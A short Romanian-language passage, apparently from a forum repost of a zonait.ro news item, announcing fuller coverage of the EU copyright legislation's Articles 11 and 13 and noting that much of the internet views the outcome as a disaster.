o explicație mai pe larg a conceptelor din spatele noii legislații, dar mai ales ideile de bază pentru Articolul 11 și Articolul 13. De asemenea, spre sfârșitul săptămânii veți avea parte de un articol mai detaliat despre cum s-a ajuns la acest rezultat, considerat de o mare parte a internetului ca fiind un dezastru de proporții pentru umanitate. [Reuters] Sursa: https://zonait.ro/adio-internet-articolul-11-articolul-13/
×
×
  • Create New...